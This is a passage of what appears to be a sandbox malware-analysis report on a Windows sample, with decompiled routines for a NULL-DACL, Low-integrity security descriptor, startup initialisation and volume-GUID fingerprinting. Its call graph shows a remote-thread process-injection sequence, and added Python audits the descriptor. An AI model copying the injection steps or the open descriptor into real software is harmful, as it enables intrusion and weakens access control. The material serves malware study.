8 API calls 10767->10768 10877 403c5d 10767->10877 
10769 404dc3 CloseHandle 10768->10769 10773 404dcc 10769->10773 10770 404dd7 GetLengthSid 10770->10773 10771 410418 HeapFree 10771->10773 10772 4103a8 3 API calls 10772->10773 10773->10766 10773->10770 10773->10771 10773->10772 10884 404c7d OpenProcess 10773->10884 10783 4040f9 10775->10783 10776 40418b CloseHandle 10776->10310 10777 40412a 10778 40413f 10777->10778 10779 414332 2 API calls 10777->10779 10780 404159 10778->10780 10781 414332 2 API calls 10778->10781 10779->10778 10782 40417a 10780->10782 10785 414332 2 API calls 10780->10785 10784 404154 10781->10784 10782->10776 10935 414377 10782->10935 10783->10776 10783->10777 10923 414332 10783->10923 10928 40d550 HeapAlloc 10784->10928 10788 40416e 10785->10788 10790 414332 2 API calls 10788->10790 10790->10782 10794 403cc5 StringFromGUID2 10793->10794 10795 403d16 CreateMutexW 10794->10795 10796 403d2b 10795->10796 10798 403d32 10795->10798 10941 4139d2 WaitForSingleObject 10796->10941 10798->10318 10798->10320 10800 40f369 10799->10800 10801 405856 LoadLibraryW 10800->10801 10802 405869 10801->10802 10821 405900 10801->10821 10803 405876 GetProcAddress 10802->10803 10804 4058f4 FreeLibrary 10803->10804 10805 405884 10803->10805 10815 405907 10804->10815 10804->10821 10805->10804 10807 40589d SHGetFolderPathW 10805->10807 10806 405912 NetUserEnum 10806->10815 10807->10804 10808 4058b5 10807->10808 10813 4058c0 StrCmpNIW 10808->10813 10809 405a1f SHGetFolderPathW 10810 405a3a 10809->10810 10809->10821 10814 41484c 5 API calls 10810->10814 10811 405956 NetUserGetInfo 10811->10815 10812 405a0a NetApiBufferFree 10812->10815 10813->10804 10816 4058d8 10813->10816 10817 405a51 10814->10817 10815->10806 10815->10809 10815->10811 10815->10812 10820 4059f8 NetApiBufferFree 10815->10820 10822 415d45 PathCombineW 10815->10822 10945 40f504 ConvertSidToStringSidW 10815->10945 10954 415ac4 PathSkipRootW 10815->10954 10959 41484c 10815->10959 10966 404f83 10815->10966 10984 4050b0 10815->10984 10816->10804 10819 404f83 19 
API calls 10817->10819 10817->10821 10819->10821 10820->10815 10821->10339 10822->10815 10828 416903 VirtualProtect 10827->10828 10829 416932 10827->10829 10828->10829 10829->10348 10832 405173 10831->10832 10833 40503f 17 API calls 10832->10833 10834 4051a2 FreeLibrary 10832->10834 10837 4051eb 10832->10837 10833->10832 10836 4051b3 10834->10836 10836->10350 10837->10350 10839 411ceb 10838->10839 10840 411cfe 10838->10840 10841 411220 4 API calls 10839->10841 10842 411220 4 API calls 10840->10842 10843 411cf9 10841->10843 10842->10843 10844 404632 10843->10844 11084 411c5d 10843->11084 10844->10339 10844->10362 10846 411d27 10847 410418 HeapFree 10846->10847 10847->10844 11090 4111e9 10849->11090 10851 414ad5 10852 414aea 10851->10852 11095 414af8 10851->11095 10852->10310 10855 410400 HeapAlloc 10854->10855 10856 410474 10855->10856 10856->10726 10858 403f78 10857->10858 10859 410628 MultiByteToWideChar 10858->10859 10861 403fc7 10858->10861 10860 403fa2 10859->10860 10860->10861 10862 415d45 PathCombineW 10860->10862 10861->10749 10863 403fb5 10862->10863 10863->10861 10864 410628 MultiByteToWideChar 10863->10864 10864->10861 10866 414593 10865->10866 10867 41454d RegQueryValueExW 10865->10867 10866->10755 10868 414589 RegCloseKey 10867->10868 10869 41456c 10867->10869 10868->10866 10870 414580 10869->10870 10875 414573 10869->10875 10876 4103ed HeapAlloc 10869->10876 10873 410418 HeapFree 10870->10873 10872 4145a0 10872->10870 10874 4145a6 RegQueryValueExW 10872->10874 10873->10875 10874->10870 10874->10875 10875->10868 10876->10872 10878 403c75 10877->10878 10879 4149f0 StringFromGUID2 10878->10879 10880 403ca1 CreateMutexW 10879->10880 10881 403cb6 10880->10881 10882 403cbb 10880->10882 10883 413a5e 2 API calls 10881->10883 10882->10767 10883->10882 10885 404cfd 10884->10885 10886 404c9d 10884->10886 10885->10773 10893 403d3b 10886->10893 10889 404cf5 CloseHandle 10889->10885 10890 404cad CreateRemoteThread 10891 404ce7 VirtualFreeEx 10890->10891 10892 404ccc 
WaitForSingleObject CloseHandle 10890->10892 10891->10889 10892->10889 10908 414e5f IsBadReadPtr 10893->10908 10896 403d55 10896->10889 10896->10890 10897 403d5c DuplicateHandle 10898 403d77 10897->10898 10899 403d7b WriteProcessMemory 10897->10899 10898->10899 10900 403dac 10899->10900 10901 403daf WriteProcessMemory 10899->10901 10900->10901 10902 403dcf 10901->10902 10919 403567 DuplicateHandle 10902->10919 10905 403567 3 API calls 10906 403e01 10905->10906 10906->10896 10907 403e0d VirtualFreeEx 10906->10907 10907->10896 10909 414e8c VirtualAllocEx 10908->10909 10910 403d4c 10908->10910 10909->10910 10911 414eaa 10909->10911 10910->10896 10910->10897 10912 41046b HeapAlloc 10911->10912 10918 414eb1 10912->10918 10913 414f43 VirtualFreeEx 10913->10910 10914 414f37 10915 410418 HeapFree 10914->10915 10916 414f3d 10915->10916 10916->10910 10916->10913 10917 414f20 WriteProcessMemory 10917->10914 10918->10913 10918->10914 10918->10917 10920 403593 WriteProcessMemory 10919->10920 10921 4035ad 10919->10921 10920->10921 10922 4035b1 DuplicateHandle 10920->10922 10921->10905 10922->10921 10924 414337 SetLastError 10923->10924 10925 414346 10923->10925 10927 414342 10924->10927 10926 41434d CreateThread 10925->10926 10925->10927 10926->10927 10927->10777 10929 40d5b2 10928->10929 10930 40d56f HeapAlloc 10928->10930 10929->10780 10930->10929 10931 40d580 10930->10931 10932 414332 2 API calls 10931->10932 10933 40d5a7 10932->10933 10934 414332 2 API calls 10933->10934 10934->10929 10936 404186 10935->10936 10937 41437d WaitForMultipleObjects 10935->10937 10938 41439a 10936->10938 10937->10936 10939 4143a1 CloseHandle 10938->10939 10940 4143b4 10938->10940 10939->10939 10939->10940 10940->10776 10942 4139f0 10941->10942 10943 4139df 10941->10943 10942->10798 10943->10942 10944 4139e6 CloseHandle 10943->10944 10944->10798 10946 40f525 10945->10946 10947 40f5a9 10945->10947 10948 4111a5 wvnsprintfW 10946->10948 10947->10815 10950 40f550 10948->10950 10949 40f59d LocalFree 
10949->10947 10950->10949 11003 4143b6 RegOpenKeyExW 10950->11003 10953 40f57a PathUnquoteSpacesW ExpandEnvironmentStringsW 10953->10949 10955 415adb 10954->10955 10956 415af1 GetFileAttributesW 10955->10956 10958 415b22 10955->10958 10956->10955 10957 415b05 CreateDirectoryW 10956->10957 10957->10955 10958->10815 10962 414858 10959->10962 10961 415d45 PathCombineW 10961->10962 10962->10961 10963 414897 GetFileAttributesW 10962->10963 10964 414887 PathAddExtensionW 10962->10964 10965 4148ab 10962->10965 11007 41471a 10962->11007 10963->10962 10963->10965 10964->10962 10964->10963 10965->10815 10967 415750 6 API calls 10966->10967 10968 404f9d 10967->10968 10969 404fc1 10968->10969 10970 404fc3 10968->10970 10971 404fa7 10968->10971 10969->10815 10973 41046b HeapAlloc 10970->10973 11023 404f37 10971->11023 10975 404fcf 10973->10975 10977 4157f8 2 API calls 10975->10977 10976 4157f8 2 API calls 10976->10969 10978 404fd9 10977->10978 10978->10969 11029 404084 10978->11029 10981 404ff8 10982 410418 HeapFree 10981->10982 10982->10969 10983 404f37 7 API calls 10983->10981 10985 40f369 10984->10985 10986 4050c4 LoadLibraryW 10985->10986 10987 4051b3 10986->10987 10988 4050d8 10986->10988 10987->10820 10989 4050e7 GetProcAddress 10988->10989 11051 40f333 10989->11051 10992 40f333 10993 40511c GetProcAddress 10992->10993 10994 4051a8 FreeLibrary 10993->10994 10995 40512c 10993->10995 10994->10987 10995->10994 11053 411ade GetCurrentThread OpenThreadToken 10995->11053 10998 40514d 11061 40503f 10998->11061 11000 4051a2 11000->10994 11001 40515a 11001->10994 11001->11000 11002 40503f 17 API calls 11001->11002 11002->11001 11004 4143d3 11003->11004 11006 40f571 11003->11006 11005 41449e 2 API calls 11004->11005 11005->11006 11006->10949 11006->10953 11017 41185e 11007->11017 11018 41186c 11017->11018 11019 411867 11017->11019 11021 411812 GetTickCount 11018->11021 11020 411812 GetTickCount 11019->11020 11020->11018 11022 411820 11021->11022 11024 404f62 SetFileAttributesW 
11023->11024 11033 4156eb CreateFileW 11024->11033 11027 404f51 Sleep 11027->11024 11028 404f77 11028->10976 11030 4040a2 11029->11030 11031 4040ca 11030->11031 11042 4167da 11030->11042 11031->10981 11031->10983 11034 415712 11033->11034 11035 404f46 11033->11035 11036 415732 11034->11036 11037 41571c WriteFile 11034->11037 11035->11027 11035->11028 11038 415734 CloseHandle 11036->11038 11037->11036 11037->11038 11038->11035 11039 415740 11038->11039 11041 4158d7 SetFileAttributesW DeleteFileW 11039->11041 11041->11035 11043 4167f4 11042->11043 11045 4167f0 11042->11045 11046 4119cd 11043->11046 11045->11031 11047 411a03 11046->11047 11048 4119d6 11046->11048 11047->11045 11048->11047 11049 4119e1 Sleep 11048->11049 11050 41185e GetTickCount 11048->11050 11049->11048 11050->11048 11052 405104 GetProcAddress 11051->11052 11052->10992 11054 411b15 LookupPrivilegeValueW 11053->11054 11055 411aff OpenProcessToken 11053->11055 11057 411b35 AdjustTokenPrivileges 11054->11057 11058 411b56 CloseHandle 11054->11058 11055->11054 11056 40513f WTSGetActiveConsoleSessionId 11055->11056 11056->10998 11056->11001 11057->11058 11059 411b4a GetLastError 11057->11059 11058->11056 11059->11058 11060 411b54 11059->11060 11060->11058 11062 40504c 11061->11062 11063 4050ac 11062->11063 11064 413971 5 API calls 11062->11064 11063->11001 11065 405059 11064->11065 11066 4050a2 CloseHandle 11065->11066 11067 40505f EqualSid 11065->11067 11066->11063 11068 40509b 11067->11068 11069 40506e 11067->11069 11071 410418 HeapFree 11068->11071 11070 411220 4 API calls 11069->11070 11072 405083 11070->11072 11071->11066 11072->11068 11076 411d38 LoadLibraryA 11072->11076 11075 410418 HeapFree 11075->11068 11077 411d5a GetProcAddress GetProcAddress 11076->11077 11078 405093 11076->11078 11079 411e11 FreeLibrary 11077->11079 11080 411d81 11077->11080 11078->11075 11079->11078 11080->11079 11081 411dc1 CreateProcessAsUserW 11080->11081 11082 411def CloseHandle CloseHandle 11081->11082 11083 411e06 
11081->11083 11082->11083 11083->11079 11085 411c70 11084->11085 11086 411c8f CreateProcessW 11085->11086 11087 411cac 11086->11087 11089 411cb1 11086->11089 11088 411cc1 CloseHandle CloseHandle 11087->11088 11087->11089 11088->11089 11089->10846 11091 4111f1 11090->11091 11092 4111f5 11090->11092 11091->10851 11093 4111fc wvnsprintfA 11092->11093 11094 411214 11093->11094 11094->10851 11113 4158f8 GetTempPathW 11095->11113 11098 414b1a CharToOemW 11099 411233 4 API calls 11098->11099 11100 414b46 11099->11100 11101 414bfb 11100->11101 11103 4156eb 5 API calls 11100->11103 11120 4158d7 SetFileAttributesW DeleteFileW 11101->11120 11104 414b63 11103->11104 11105 410418 HeapFree 11104->11105 11106 414b6d 11105->11106 11106->11101 11107 4111a5 wvnsprintfW 11106->11107 11108 414b93 11107->11108 11108->11101 11109 414b9b GetEnvironmentVariableW 11108->11109 11109->11101 11110 414bba 11109->11110 11111 411cdd 7 API calls 11110->11111 11112 414bf3 11111->11112 11112->10852 11115 41591d 11113->11115 11119 414b12 11113->11119 11114 411812 GetTickCount 11114->11115 11115->11114 11116 4111a5 wvnsprintfW 11115->11116 11117 415d45 PathCombineW 11115->11117 11118 4156eb 5 API calls 11115->11118 11115->11119 11116->11115 11117->11115 11118->11115 11119->11098 11119->11112 11120->11112

            Control-flow Graph

            C-Code - Quality: 79%
            			E00413873(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
            				signed int _v8;            // PSECURITY_DESCRIPTOR built from the SDDL string
            				struct _ACL* _v12;         // SACL taken out of that descriptor
            				int _v16;                  // SACL "defaulted" flag
            				int _v20;                  // SACL "present" flag
            				struct _SECURITY_DESCRIPTOR* _t28;
            				intOrPtr* _t29;
            
            				_t29 = __esi;              // optional out: a SECURITY_ATTRIBUTES to fill in
            				_t28 = __edi;              // caller-supplied absolute SECURITY_DESCRIPTOR (0041A2D4)
            				// bDaclPresent = TRUE with pDacl = NULL is a NULL DACL: no discretionary access check at all,
            				// so every caller gets full access to whatever object this descriptor is applied to.
            				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
            					return 0;
            				} else {
            					// Second descriptor from SDDL; its SACL holds only a mandatory label: integrity level LW (Low)
            					// with policy NR|NW|NX. The policy restricts callers *below* the label's level only, so the
            					// object stays reachable from Low-integrity processes (e.g. a browser's protected-mode tab).
            					// The decompiler lost this call's return value; the API list below shows it is
            					// ConvertStringSecurityDescriptorToSecurityDescriptorW(sddl, SDDL_REVISION_1, &sd, NULL).
            					if(ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1,  &_v8, 0) == 0) { // executed
            						L6:
            						_v8 = _v8 | 0xffffffff;   // failure: return -1 (not 0), but still fill the out struct
            						L7:
            						if(_t29 != 0) {
            							 *_t29 = 0xc;               // SECURITY_ATTRIBUTES.nLength
            							 *(_t29 + 4) = _t28;        // lpSecurityDescriptor = the NULL-DACL / Low-label descriptor
            							 *((intOrPtr*)(_t29 + 8)) = 0;   // bInheritHandle = FALSE
            						}
            						return _v8;
            					}
            					_v12 = 0;
            					// Copy the mandatory-label SACL onto the caller's descriptor. On success the converted
            					// descriptor is deliberately not freed: _v12 points into it and must stay valid.
            					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
            						LocalFree(_v8);
            						goto L6;
            					} else {
            						goto L7;
            					}
            				}
            			}


            APIs
            • InitializeSecurityDescriptor.ADVAPI32(0041A2D4,00000001,00000000,00000000,00403AF4,?,00000000), ref: 0041387D
            • SetSecurityDescriptorDacl.ADVAPI32(0041A2D4,00000001,00000000,00000000,?,00000000), ref: 0041388E
            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 004138A4
            • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,00000000), ref: 004138BF
            • SetSecurityDescriptorSacl.ADVAPI32(0041A2D4,?,?,?,?,00000000), ref: 004138D3
            • LocalFree.KERNEL32(00000000,?,00000000), ref: 004138E0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
            • String ID: S:(ML;;NRNWNX;;;LW)
            • API String ID: 2050860296-820036962
            • Opcode ID: 751d40e5a0314824f90da1a7367051ddf1549b2fea14c0309d1912608cb11b4c
            • Instruction ID: 0f3395e7b72d2451ab94a713eddd680364df6529fd175c43f6694c2d08b2c48c
            • Opcode Fuzzy Hash: 751d40e5a0314824f90da1a7367051ddf1549b2fea14c0309d1912608cb11b4c
            • Instruction Fuzzy Hash: FE115E71A00209BBEB11AFA48D85EEFBBFCAF04741F10406AF551F11A0D7759A809B28
            Uniqueness

            Uniqueness Score: -1.00%
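The SDDL string in E00413873 is the security-relevant detail of that routine. The descriptor gets a NULL DACL through SetSecurityDescriptorDacl (no discretionary check at all) and, from the SDDL, a mandatory label at Low integrity with policy NR|NW|NX. A label's policy restricts only callers whose integrity level is below the label's, so at Low the only callers it turns away run at Untrusted integrity; despite the restrictive-looking policy the object is fully reachable from Low-integrity processes such as a browser's protected-mode tab, which is the opposite of what an unlabelled object (implicitly Medium, no-write-up) allows. The parser below is an added example, not code from the sample or from Joe Sandbox. It handles the subset of SDDL seen here (D: and S: sections with six-field ACEs, a NULL DACL spelled NO_ACCESS_CONTROL, integrity SIDs as two-letter aliases or raw S-1-16-<rid>) and evaluates the mandatory integrity check for a given caller. The `null_dacl` argument of `audit()` stands in for the SetSecurityDescriptorDacl(sd, TRUE, NULL, FALSE) call, which the SDDL string itself does not express.

```python
import re
from dataclasses import dataclass, field

# Integrity-level SIDs (S-1-16-<level>) in their SDDL two-letter forms.
LEVELS = {"LW": 0x1000, "ME": 0x2000, "HI": 0x3000, "SI": 0x4000}
LEVEL_NAMES = {0x0: "untrusted", 0x1000: "low", 0x2000: "medium",
               0x3000: "high", 0x4000: "system"}
POLICY_FOR_ACCESS = {"read": "NR", "write": "NW", "execute": "NX"}
SECTION_RE = re.compile(r"([OGDS]):((?:(?![OGDS]:).)*)")
ACE_RE = re.compile(r"\(([^)]*)\)")


@dataclass
class Ace:
    ace_type: str   # A, D, AU, ML, ...
    flags: str
    rights: str     # for an ML ACE this field is the label policy: NR/NW/NX
    sid: str


@dataclass
class Descriptor:
    dacl_present: bool = False
    dacl_null: bool = False          # NULL DACL: no discretionary check at all
    dacl: list = field(default_factory=list)
    sacl: list = field(default_factory=list)


def _parse_acl(body):
    """Split 'FLAGS(ace)(ace)...' into (flags, [Ace, ...])."""
    flags = body.split("(", 1)[0]
    aces = []
    for inner in ACE_RE.findall(body):
        parts = inner.split(";")
        if len(parts) != 6:
            raise ValueError("unsupported ACE form: (%s)" % inner)
        aces.append(Ace(parts[0], parts[1], parts[2], parts[5]))
    return flags, aces


def parse_sddl(sddl):
    """Parse the D: and S: sections of an SDDL string (O:/G: are skipped)."""
    desc = Descriptor()
    for section, body in SECTION_RE.findall(sddl):
        if section == "D":
            flags, desc.dacl = _parse_acl(body)
            desc.dacl_present = True
            desc.dacl_null = flags.startswith("NO_ACCESS_CONTROL")
        elif section == "S":
            _, desc.sacl = _parse_acl(body)
    return desc


def integrity_level(sid):
    """Level RID for an SDDL alias or a raw S-1-16-<rid> string."""
    if sid in LEVELS:
        return LEVELS[sid]
    m = re.fullmatch(r"S-1-16-(\d+)", sid)
    if m is None:
        raise ValueError("not an integrity SID: %s" % sid)
    return int(m.group(1))


def mandatory_label(desc):
    """(level, policy) of the first ML ACE in the SACL; an unlabelled object
    gets the implicit Windows default of medium integrity with no-write-up."""
    for ace in desc.sacl:
        if ace.ace_type == "ML":
            return integrity_level(ace.sid), ace.rights
    return LEVELS["ME"], "NW"


def label_blocks(desc, caller_level, access):
    """Mandatory integrity check: only a caller *below* the label's level is
    refused, and only for the accesses named in the policy."""
    level, policy = mandatory_label(desc)
    if caller_level >= level:
        return False
    return POLICY_FOR_ACCESS[access] in policy


def audit(sddl, null_dacl=False):
    """Findings for a descriptor built like the sample's: the SDDL SACL plus,
    when null_dacl is set, the NULL DACL applied via SetSecurityDescriptorDacl."""
    desc = parse_sddl(sddl)
    if null_dacl:
        desc.dacl_present, desc.dacl_null, desc.dacl = True, True, []
    findings = []
    if desc.dacl_null:
        findings.append("null DACL: every caller passes the discretionary check")
    level, policy = mandatory_label(desc)
    findings.append("label %s (%s)" % (LEVEL_NAMES.get(level, hex(level)), policy))
    if not label_blocks(desc, LEVELS["LW"], "write"):
        findings.append("writable from a low-integrity process")
    return findings


if __name__ == "__main__":
    for line in audit("S:(ML;;NRNWNX;;;LW)", null_dacl=True):
        print(line)
```

Run against a descriptor with only a DACL, such as D:P(A;;GA;;;WD), the same Low-integrity caller is refused write access because the implicit Medium label carries no-write-up; that contrast is why the sample's explicit Low label matters more than its NULL DACL.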

            Control-flow Graph

            C-Code - Quality: 92%
            			E00403A5D(void* __ecx, void* __edx, void* __edi, signed char _a4) {
            				char _v404;                  // WSADATA handed to WSAStartup
            				void* __esi;
            				void* _t15;
            				signed int _t18;
            				signed int _t19;
            				signed int _t20;
            				void** _t21;
            				void** _t23;
            				signed int _t25;
            				signed int _t27;
            				signed int _t28;
            				signed int _t29;
            				signed int _t31;
            				long _t34;
            				void* _t36;
            				void* _t37;
            				void* _t38;
            				signed int _t41;
            
            				_t38 = __edi;
            				_t37 = __edx;
            				_t36 = __ecx;
            				_t41 = _a4 & 0x00000001;     // initialisation flags: bit 0 and bit 1 are tested below
            				_t34 = 0;
            				if(_t41 == 0) {
            					 *0x41a290 = _t34;
            				}
            				if(E004035C8(_t37, _a4) != 0) {
            					// Private growable heap (0x80000 bytes initial commit) for the sample's own allocations;
            					// 0x41a803 records whether it owns that heap or fell back to the process heap.
            					_t15 = HeapCreate(_t34, 0x80000, _t34); // executed
            					 *0x41bc68 = _t15;
            					__eflags = _t15 - _t34;
            					if(_t15 != _t34) {
            						 *0x41a803 = 1;
            					} else {
            						 *0x41bc68 = GetProcessHeap();
            						 *0x41a803 = _t34;
            					}
            					 *0x41ae9c = _t34;
            					 *0x41a802 = _t34;
            					InitializeCriticalSection(0x41a760);
            					 *0x41a28c = _t34; // executed
            					// ws2_32 ordinal 115 is WSAStartup (the API list below resolves it at 00403AE6); importing
            					// by ordinal keeps the name out of the import table. 0x202 requests Winsock 2.2.
            					__imp__#115(0x202,  &_v404); // executed
            					_t18 = E004036E0(_a4, _t36, _t38, _t41);
            					__eflags = _t18;
            					if(_t18 == 0) {
            						goto L3;
            					} else {
            						_t20 = E0040375F(_a4);
            						__eflags = _t20;
            						if(_t20 == 0) {
            							goto L3;
            						} else {
            							// Token information for the current process (0xffffffff is the GetCurrentProcess()
            							// pseudo-handle); the returned buffer starts with a pointer to the user SID.
            							_t21 = E00411A2C(_t36, 0xffffffff, 0x41a2a0);
            							 *0x41a294 = _t21;
            							__eflags = _t21 - _t34;
            							if(_t21 == _t34) {
            								goto L3;
            							} else {
            								 *0x41a298 = GetLengthSid( *_t21);      // cache the SID length
            								_t23 =  *0x41a294; // 0x0
            								 *0x41a29c = E00411888( *_t23, _t22);  // value derived from the SID (E00411888 not shown here)
            								_t25 = E004037AD(_t24, _a4);
            								__eflags = _t25;
            								if(_t25 == 0) {
            									goto L3;
            								} else {
            									 *0x41a504 = GetCurrentProcessId();
            									 *0x41a508 = _t34;
            									__eflags = _t41 - _t34;
            									if(_t41 != _t34) {
            										_t27 = 1;                      // flag bit 0 set: skip E0040380F
            									} else {
            										_t27 = E0040380F();
            									}
            									__eflags = _t27 - _t34;
            									if(_t27 == _t34) {
            										goto L3;
            									} else {
            										_t28 = E00403861(_a4);
            										__eflags = _t28;
            										if(_t28 == 0) {
            											goto L3;
            										} else {
            											_t29 = E004038A7(_a4);
            											__eflags = _t29;
            											if(_t29 == 0) {
            												goto L3;
            											} else {
            												// Reset a block of globals, then run E00403947 unless flag bit 1 is set.
            												__eflags = _a4 & 0x00000002;
            												 *0x41bc78 = _t34;
            												 *0x41aa80 = 0;
            												 *0x41a7a0 = 0;
            												 *0x41a870 = 0;
            												 *0x41a808 = 0;
            												 *0x41a958 = 0;
            												 *0x41a8f0 = 0;
            												if(__eflags == 0) {
            													_t31 = 1;
            												} else {
            													_t31 = E00403947(_t36, _t37, __eflags);
            												}
            												// setne al: the function returns 1 on success, 0 otherwise.
            												__eflags = _t31 - _t34;
            												_t13 = _t31 != _t34;
            												__eflags = _t13;
            												_t19 = _t31 & 0xffffff00 | _t13;
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				} else {
            					L3:
            					_t19 = 0;                    // any failed stage aborts initialisation
            				}
            				return _t19;
            			}

            APIs
            • HeapCreate.KERNELBASE(00000000,00080000,00000000,00000000,?,00000000), ref: 00403A96
            • GetProcessHeap.KERNEL32(?,00000000), ref: 00403AA5
            • InitializeCriticalSection.KERNEL32(0041A760,?,00000000), ref: 00403AD0
            • WSAStartup.WS2_32(00000202,?), ref: 00403AE6
            • GetLengthSid.ADVAPI32(00000000,000000FF,0041A2A0,00000000,?,00000000), ref: 00403B1F
            • GetCurrentProcessId.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00403B4C
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: HeapProcess$CreateCriticalCurrentInitializeLengthSectionStartup
            • String ID:
            • API String ID: 2528102454-0
            • Opcode ID: dde0ae83ecacf24f674dfdb637875a71352792fd4847cb568878d810a7e51c77
            • Instruction ID: 32dc000f30b7c3c9b635613a1cf18e84f09b57cc9751b60119397a14bf2bc44b
            • Opcode Fuzzy Hash: dde0ae83ecacf24f674dfdb637875a71352792fd4847cb568878d810a7e51c77
            • Instruction Fuzzy Hash: 8E31D170511204AECB11BF64ED466D53FA8AB1435AB00817FF844A73B2DB3D4AA5CB5E
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 32%
            			E0041493F() {
            				void* _t21;
            				void* _t29;
            				void* _t30;
            				void* _t31;
            				void* _t34;
            				intOrPtr* _t36;
            				void* _t37;
            				void* _t40;
            				void* _t42;
            
            				_t40 = _t42 - 0x74;
            				_t31 = 0; // executed
            				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t40 - 0x25c, _t34, _t37, _t30); // executed
            				if(0 != 0) {
            					L8:
            					E004104B9( *((intOrPtr*)(_t40 + 0x7c)), 0x10);
            				} else {
            					PathAddBackslashW(_t40 - 0x25c);
            					_t36 = __imp__GetVolumeNameForVolumeMountPointW;
            					while(1) {
            						_t21 =  *_t36(_t40 - 0x25c, _t40 - 0x54, 0x64); // executed
            						if(_t21 != 0) {
            							break;
            						}
            						PathRemoveBackslashW(_t40 - 0x25c);
            						if(PathRemoveFileSpecW(_t40 - 0x25c) == 0) {
            							goto L8;
            						} else {
            							PathAddBackslashW(_t40 - 0x25c);
            							continue;
            						}
            						goto L9;
            					}
            					if( *((short*)(_t40 - 0x40)) != 0x7b) {
            						goto L8;
            					} else {
            						 *((short*)(_t40 + 0xc)) = 0;
            						_t29 = _t40 - 0x40;
            						__imp__CLSIDFromString(_t29,  *((intOrPtr*)(_t40 + 0x7c)));
            						if(_t29 != 0) {
            							goto L8;
            						} else {
            							_t31 = 1;
            						}
            					}
            				}
            				L9:
            				return _t31;
            			}

            Instruction addresses (per-line address column of the rendered C-code view, collapsed): 0x00414940 .. 0x004149ed

            APIs
            • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,00000000,00000000), ref: 0041495D
            • PathAddBackslashW.SHLWAPI(?,?,00000000,00000000), ref: 00414974
            • PathRemoveBackslashW.SHLWAPI(?,?,00000000,00000000), ref: 00414985
            • PathRemoveFileSpecW.SHLWAPI(?,?,00000000,00000000), ref: 00414992
            • PathAddBackslashW.SHLWAPI(?,?,00000000,00000000), ref: 004149A3
            • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064,?,00000000,00000000), ref: 004149B2
            • CLSIDFromString.OLE32(?,?,?,00000000,00000000), ref: 004149CC
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
            • String ID:
            • API String ID: 613918483-0
            • Opcode ID: e599c282255295374b0e4b888da2396a8634d9a93b45e76e3e1faf1b481da758
            • Instruction ID: df345cd24bca8c655181560241360e73fc933718f6736cb605dff7e2021c4ae5
            • Opcode Fuzzy Hash: e599c282255295374b0e4b888da2396a8634d9a93b45e76e3e1faf1b481da758
            • Instruction Fuzzy Hash: E71151B191021CAEDB209FB1DC48EDB77BCAB44315F104567E515E3160E638DA998B68
            Uniqueness

            Uniqueness Score: -1.00%
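E0041493F above resolves CSIDL 0x24 (CSIDL_WINDOWS), climbs the directory tree one component at a time until GetVolumeNameForVolumeMountPointW accepts the path, then requires '{' at WCHAR index 10 of the returned \\?\Volume{...}\ name, writes a NUL at index 48 (the trailing backslash) and hands the braced GUID to CLSIDFromString. The value it produces is the GUID of the volume holding the Windows directory, a stable per-machine identifier. The Python below is an added analyst's emulation of that walk, not code from the sample or from the report: the mount-point resolver and the GUID inside it are constructed stand-ins for the Windows API and a real volume, and the two shlwapi helpers are simplified to the cases this loop exercises.

```python
import uuid
from typing import Callable, Optional, Tuple

# Constructed stand-in for GetVolumeNameForVolumeMountPointW: the real API only
# succeeds for a mount point (drive root or mounted folder) ending in a backslash.
# The GUID is made up for this example.
FAKE_MOUNT_POINTS = {
    "C:\\": "\\\\?\\Volume{3f2504e0-4f89-41d3-9a0c-0305e82c3301}\\",
}


def fake_get_volume_name(mount_point: str) -> Optional[str]:
    return FAKE_MOUNT_POINTS.get(mount_point)


def path_add_backslash(p: str) -> str:
    return p if p.endswith("\\") else p + "\\"


def path_remove_backslash(p: str) -> str:
    # Simplified PathRemoveBackslashW: a drive root such as C:\ keeps its backslash.
    if p.endswith("\\") and not (len(p) == 3 and p[1] == ":"):
        return p[:-1]
    return p


def path_remove_file_spec(p: str) -> Tuple[str, bool]:
    """Drop the last path component; False means nothing was removed (PathRemoveFileSpecW)."""
    cut = p.rfind("\\")
    if cut <= 0 or (len(p) == 3 and p[1] == ":"):
        return p, False
    head = p[:cut]
    if len(head) == 2 and head[1] == ":":
        head += "\\"                       # C:\Windows -> C:\ (the root keeps its backslash)
    return head, True


def volume_guid_for_folder(folder: str,
                           get_volume_name: Callable[[str], Optional[str]] = fake_get_volume_name
                           ) -> Optional[Tuple[str, uuid.UUID]]:
    """Emulates E0041493F: climb from `folder` to the nearest mount point and
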